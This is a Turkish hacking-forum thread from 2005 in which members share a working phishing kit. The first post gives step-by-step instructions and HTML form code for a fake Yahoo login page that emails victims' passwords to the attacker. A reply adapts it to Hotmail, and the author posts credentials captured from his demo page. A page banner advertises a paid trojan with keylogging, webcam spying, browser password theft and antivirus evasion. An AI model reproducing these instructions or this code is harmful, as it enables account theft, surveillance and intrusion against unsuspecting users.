Kendi Fake Mailini Kendin Yap, Garantili!

Arkadaslar Buyrun simdilik yahoo icin ama bu yontemı butun mailler icin kullanabilirsiniz. Oncelikle asagıdaki linke giriyorsunuz. http://www.formbuddy.com/register.html Acılan sayfaya sifrelerin gelecegi mail adresini yazın.(bu olay ıcın yenı bir mail adresi Konu ganglia tarafından açılmış, 4047 kişi tarafından görüntülenip, 32 yanıt almış.

Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!

Karşı sistemi kendi makineniniz gibi kullandıran uzaktan yönetim programı.
  • Canlı ekran izleme,vnc ve mouse kontrolü
  • Antiviruslerce %100 tanınmaz, güncelleme garantili
  • Ortam sesi dinleme
  • Webcam izleme
  • Online/offline keylogger
  • Kopyala/Yapıştır, Clipboard Yöneticisi (Canlı)
  • Warlogger desteği
  • Çalıştırma,upload,download,yeniden adlandırma,silme,gizli çalıştırma,thumbnail görüntüleme(indirmeden dosya görme)
  • Registry yöneticisi (tam özellikli)
  • Msn şifrelerini ve geçmişteki tüm adresleri çıkartma
  • Firefox şifrelerini çözme
  • Görev yöneticisi, görev sonlandırma
  • Çalışan programları listeleme
  • Bağlı sistemlerin yaptığı işlemleri tek listede görme!
  • Binder / dosya birleştirici
  • Virus tipinde resource kullanmadan bindleme özelliği
  • Mp3,resim,jpeg,vs her türlü dosya ile birleşip,exploitler ile link üzerinden,htmlden yayılır
  • Keyloggerda dll kullanmadan system hooklarıyla loglama ve tabii dll kullanmadan kimse yapamıyorken %100 sisteme zarar vermeden stabil bütün dünya dillerinde loglama.
  • Internet Explorer 9 şifre çözme
  • Chrome Şifreleri (bütün sürümler)
  • Firefox Şifreleri (bütün sürümler)
  • Internet Exporer Şifreleri (bütün sürümler)
  • Safari Şifreleri (bütün sürümler)
  • Reklam Bot ile site reklamı, dosya yükletme, bulaştırma,vs. MSN,Yahoo Messenger,ICQ ve AIM sistemlerinin hepsini tanır. Reklam bot aynı anda birden fazla sisteme komut verebilir.
  • Browserda geçmiş verileri, form girdilerini kayıt edip trojandan erişme
  • Klavye Kilitleme
  • Mouse Kilitleme
  • Masaüstü Gizleme
  • Sistemlere takılı flash/usb disk varsa bulaştırma Birden fazla sisteme aynı anda autorun oluşturabilir.
  • Uzaktan exe yükletme Aynı anda birden fazla sisteme exeleri tek komutla yükletebilir.
  • Fake sistem kilitleme. Tek tıklama ile karşı sistemi restart/yeniden başlat moduna geçmiş gösterip kilitleme. Kullanıcı fişten çekmediği sürece siz istemedikçe bilgisayarı kapatamaz, yeniden başlatamaz.
  • Karşı sistemin yeniden başlatılma talebinde masaustu ve bütün ekranı kapanıyor gibi gösterip kapanış sesini çalara kullanıcıyı bekletme. Kullanıcı sistemi kapatmak istediğinde siz izin vermezseniz windows kapanmaya çalışıyor gibi görünür ancak yonetim panelinden her türlü işlem yapılır.
  • Sistem servislerini yönetme
  • Outlook şifreleri çözme. (bütün outlook versiyonları outlook expressler dahil)
  • Otomatik güncelleme özelliği ile yakalanma durumunda kısa sürede otomatik güncelleme alma
Sadece 690 TL! Satın almak için iletişim formunu kullanabilirsiniz.

Ayrıca, iki farklı üst sürümü var:
Özel Trojan 990 TL: İstediğiniz isimle çalışıp, istediğiniz yere kopyalanır ve başlangıçta, msconfig'de, registry'de görünmez.
ÖZEL TROJAN 1490 TL: Görev yöneticisinde ve sistemin hiç bir yerinde görünmez.

Sürümler: 1200 TL: - Kimsenin bulamayacağı şekilde çalışır!> m3hm3t. 1750 TL: %100 gizlidir, RAM'de çalışır ve bentrojanim.exe olarak çalışsa dahi hiç bir yerde görünmez.

Wardom.Com.TR bir bilgisayar güvenliği sitesidir; hack konuları bilgisayar güvenliğinin ve bilgisinin uç noktaları olduğundan dolayı, kullanıcıları bu konularda bilgilendirmek ve güvenliklerini arttırmak için yazılmaktadır.

Geri Dön   Wardom.Com.TR > Bilgisayar Güvenliği > Mail Hacking ve Güvenlik
Üye Ol Sözlük Üye Listesi Arama Yeni Mesajlar Forumları Okundu İşaretle

Konu Başlıkları: fake garantili kendi kendin mailini yap
Üye Olmadan Yorum Yazmak İçin Tıklayın!
Kendi Fake Mailini Kendin Yap, Garantili! konusundaki toplam yorum: 32, okunma sayısı: 4047.

Eski 08-09-2005, 17:00   #1
ganglia
Daimi Üye

ganglia's Avatar

Üye numarası: #29270
Karma etkisi: 7 ganglia seviye: 10
Thumbs up Kendi Fake Mailini Kendin Yap, Garantili!

Arkadaslar Buyrun simdilik yahoo icin ama bu yontemı butun mailler icin kullanabilirsiniz. Oncelikle asagıdaki linke giriyorsunuz.

http://www.formbuddy.com/register.html

Acılan sayfaya sifrelerin gelecegi mail adresini yazın.(bu olay ıcın yenı bir mail adresi alabilirsiniz).

daha sonra bu yazdıgınız mail adresine girin gelen mailden linki tıklayarak formu doldurun. ozellikle username ve url adresini ozellikle yazın. URL yerine ıstedıgınz bir sey yazabilirsiniz.

"What would you want us to do with the forms" secenegini ise kurbanın girdigi adresin milinize gelmesini isteyorsanız "have them e-mailed to you" yapın eger siteden kontrol edecekseniz. Secenek aynı kalsın degıstırmeyin. son olarak alttaki butonu tıklayın iste uyelik tamam.

Simdi gelelim Fake mailimizi hazırlamaya. asagıda verecegim linkten Yahoo icin fake imizi indiriyoruz. İndirdikten sonra gangliafake.html dosyasının ıcıne notpad veya Wordpad MFC ile girip asagıdaki kodların oldugu bolume gidiyoruz.

Kod:
<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post"> 
<input type="hidden" name="username" value="ganglia"> 
<input type="hidden" name="to" value="mail adresi">
<input type="hidden" name="url" value="http://www.yahoo.com/"Ganglia> 
<input type=hidden name="subject" value="quakess">
Buradaki degısıklıklerı kendinize gore ayarlıyorsunuz. degıstırmezseniz mailler benim maile gelir

"ganglia" yazan yere formu doldururken yazdıgınız username ı yazın
"mail adresi" yazan yere uye oldugunuz mail adresini yazın(sifrelerin gelecegi)
"http://www.yahoo.com/" yazan yere ıstedıgınız bir url yazın(bu kurban sifreyi yazdıktan sonra acılacak sayfa) buranın hemen devamındaki ganglia yazısınıda ıstedıgınız bisey olarak degistirebilirsiniz.

bunu yaptıktan sonra farklı kaydet diyip istediginiz bi isim vererek kaydedebilirsiniz. isim uzun olsun kı kurba cakmasın daha sonra acın bu yaptıgınız sayfayı kafanıza gore uyduruk bi kullanıcı adi sifre yazın. sonra girin mailinize bakin sifre gelmismi. Sonra bu sayfayı ya bir siteye yollayın yada kurbanın mailine atın gerisi size kalmıs hayal gucunuze.

Not : Elimde yahoo oldugu ıcın bunu verdim. hotmail vs. bulursaniz. Yukarıdaki kendinize gore ayarladıgınız kodları uygun yerine koyarak. Baska fakelerde hazırlayabilirsiniz.

Buyrun Yahoo Fake sayfasını burdan indirin :
http://rapidshare.de/files/4860713/g...Fake.html.html

Arkadaslar ben yaptım yaptıgım sayfayıda aldıgım ucretsiz bi URL ye attım girip bakabilirsiniz. Sayfadaki banner lar ucretsiz sitenin bannerlarıdır. bannersiz bi sayfaya atarsaniz cıkmayacaktır. Girin kafanıza gore bi sifre yazın user a da nickinizi yazın kı tanıyım. calıstıgına ınanmayanlara yazdıgınız sifreyi soyleyim

İste fake'i koydugum adres : http://www.ibohero.8m.com/gangliafake.html
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=25967

Hadi Kolay Gelsin...
ganglia Çevrimdışı   Alıntı Yaparak Cevapla

Görüntülediğiniz konu içerik sağlayıcı paylaşım sitelerinden biri olan Wardom Internet Adresimizde 5651 Sayılı Kanunun 8. Maddesine ve T.C.Knın 125. Maddesine göre yayınlanmakta olup içeriğinden yazarı sorumludur. Bu konu hakkında yapılacak tüm hukuksal şikayetler için webmaster \@wardom.org adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 3 (üç) gün içerisinde Wardom yönetimi olarak tarafımızca gereken işlemler yapılacak ve avukatlarımız size dönüş yapacaktır.
Eski 09-09-2005, 11:36   #2
antisilence
Cool Üye

antisilence's Avatar

Üye numarası: #3484
Yer: siz yurtsuz fahişe..
Karma etkisi: 31 antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000

merhaba hocam bilgi için teşekkür ediyorum ama ben wardomda linki verilen hiç bi dosyayı indiremedim sorun bendemi acaba bildiğim ingilizceyle sitede upload yaptıktan sonra dosyayı indirebiliyomuşum anlamını çıkarıyorum upload yapıyorum ama bi numara olmuyo bana bu konudada yardım edermisin?
antisilence Çevrimdışı   Alıntı Yaparak Cevapla

Eski 09-09-2005, 11:37   #3
antisilence
Cool Üye

antisilence's Avatar

Üye numarası: #3484
Yer: siz yurtsuz fahişe..
Karma etkisi: 31 antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000antisilence seviye: 2000

merhaba hocam bilgi için teşekkür ediyorum ama ben wardomda linki verilen hiç bi dosyayı indiremedim sorun bendemi acaba bildiğim ingilizceyle sitede upload yaptıktan sonra dosyayı indirebiliyomuşum anlamını çıkarıyorum upload yapıyorum ama bi numara olmuyo bana bu konudada yardım edermisin?
antisilence Çevrimdışı   Alıntı Yaparak Cevapla

Eski 09-09-2005, 11:56   #4
romantik_pepe_1
Çırak

Üye numarası: #32486
Karma etkisi: 0 romantik_pepe_1 seviye: 10

abi valla olmıya ya yardım lutfen
romantik_pepe_1 Çevrimdışı   Alıntı Yaparak Cevapla

Eski 09-09-2005, 12:05   #5
ganglia
Daimi Üye

ganglia's Avatar

Alıntı:
Orjinal Mesaj Sahibi antisilence
dostum rapidshare'de download ederken. verilen linke tıkla acıan sayfada free var ona tıkla. ordan acılan sayfada en asagıda download yazmıyosa bekle. download yazınca yanındaki dosya adının uzerine tıkla. ındırecektir.

Eski 09-09-2005, 12:05   #6
tmacgordon
Cool Üye

tmacgordon's Avatar

Üye numarası: #26894
Karma etkisi: 7 tmacgordon seviye: 10
ii gzl yeniler için iyi ganglia ama bnce ilk bşta html öğrenn arkadaşlar sonra isterseniz fakemail yapın isterseniz hazır bulun
tmacgordon Çevrimdışı   Alıntı Yaparak Cevapla

Eski 09-09-2005, 12:16   #7
librarian
Forum Ustası

librarian's Avatar

Üye numarası: #28409
Karma etkisi: 42 librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000

sağol ganglia bende senin anlattığının hotmaili var hemde adres bile aynı ama anlatım yarım

yamalaktı yapamamıştım şimdi kaldığım yerden devam edceğim çokteşekkür ederim
librarian Çevrimdışı   Alıntı Yaparak Cevapla

Eski 09-09-2005, 14:41   #8
librarian
Forum Ustası

librarian's Avatar

Karma etkisi: 42 librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000librarian seviye: 2000

ganglia verdiğin fakeyi hotmaile çevirdim izninle burada vereyim dedim fazladan

yere konu açmayalım dedim ------------------

yöntem gene aynı adresten yapılıyo adres bu girip kayıt olun
http://www.formbuddy.com/register.html

alttaki linkten hotmail fakeyi alın ve----------------
http://rapidshare.de/files/4894125/fakehotmail.rar.html

Alıntı:
<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post">
<input type="hidden" name="username" value="devilfd">
<input type="hidden" name="to" value="mail adresiniz">
<input type="hidden" name="url" value="http://www.hotmail.com/"devilfd>
<input type=hidden name="subject" value="quakess">
yazan bölümü bulun----------------------
"devilfd" yazan yere formu doldururken yazdıgınız usernameyi yazın
"mail adresiniz" yazan yere uye olurken verdiğiniz mail adresinini yazın(bu adrese şifreler gelecek)

ve gerisi aynı

herşeyi yaptıysanız artık kesin çalışan bi hotmail fakenizde var

şimdi gmail mynet kaldı onlarıda siz yapın

Eski 09-09-2005, 14:53   #9
ganglia
Daimi Üye

ganglia's Avatar

devil eywallah dostum. ellerine saglık. katkıların ıcın cok saol

Eski 09-09-2005, 15:31   #10
METKAR
Banned

METKAR's Avatar

Üye numarası: #5031
Yer: altı
Karma etkisi: 0 METKAR seviye: -999999METKAR seviye: -999999METKAR seviye: -999999METKAR seviye: -999999METKAR seviye: -999999METKAR seviye: -999999
Kullanıcıya MSN yolu ile mesaj gönder

harika dört dörtlük helal olsun denedim saat gibi çalışıyor. eline sağlık
METKAR Çevrimdışı   Alıntı Yaparak Cevapla

Eski 09-09-2005, 16:53   #11
librarian
Forum Ustası

librarian's Avatar

ya bunları mail adreslerine direkt olarak web sayfası şeklinde gönderemiyorum

bunun nasıl yapılacağını bilen varmı

gelen mailde yazı yerine fake maili nasıl gösterebiliriz

Eski 10-09-2005, 18:19   #12
ganglia
Daimi Üye

ganglia's Avatar

Arkadaslar verdigim deneme linkine girip kullanıcı adı sifre verenleri acıklıyorum.

1-) login = lololo@hohoho.com
passwd = ehehe

2-) login = veysel_tulun
Dostum sen ne yaptın ya gercek kullanıcı adi sifre vermissin. hemde 3-4 defa denemıssın. sifreni acıklamıyorum burda

3-) login = deneme
passwd = deneme
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=25967

4-) login = devilfd@yahoo.com
passwd = benwardomdandevilfd

5-) login = ghgh
passwd = ghgfhg

6-) login = dgggg
passwd = 1234

Hadi kolay gelsin arkadaslar...

Eski 10-09-2005, 18:44   #13
harake_cigdem
Çırak

Üye numarası: #35463
Karma etkisi: 0 harake_cigdem seviye: 10

unuttugum sifremi nasil bulurum
harake_cigdem Çevrimdışı   Alıntı Yaparak Cevapla

Eski 10-09-2005, 18:47   #14
harake_cigdem
Çırak

Üye numarası: #35463
Karma etkisi: 0 harake_cigdem seviye: 10

harake_cigdem Çevrimdışı   Alıntı Yaparak Cevapla

Eski 10-09-2005, 19:00   #15
ganglia
Daimi Üye

ganglia's Avatar

Alıntı:
Orjinal Mesaj Sahibi harake_cigdem
arkadasım eger maili alırken formda alternatif bi mail adresi tanımlamıssan vede hatırlatma sorusunun cevabını biliyorsan hemen alabilirsin. ama bunlarıda hatırlamıyorsan hotmail icin bir dokuman hazırlamıstım. isine yarayabilir.

http://www.wardom.org/forum/showthread.php?t=24081

Üye Olmadan Yorum Yazmak İçin Tıklayın!
Konudaki toplam yorum: 32, okunma sayısı: 4047.

Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir)

Konu Araçları Bu Konuda Ara
Bu Konuda Ara:

Gelişmiş Arama

Gönderme Kuralları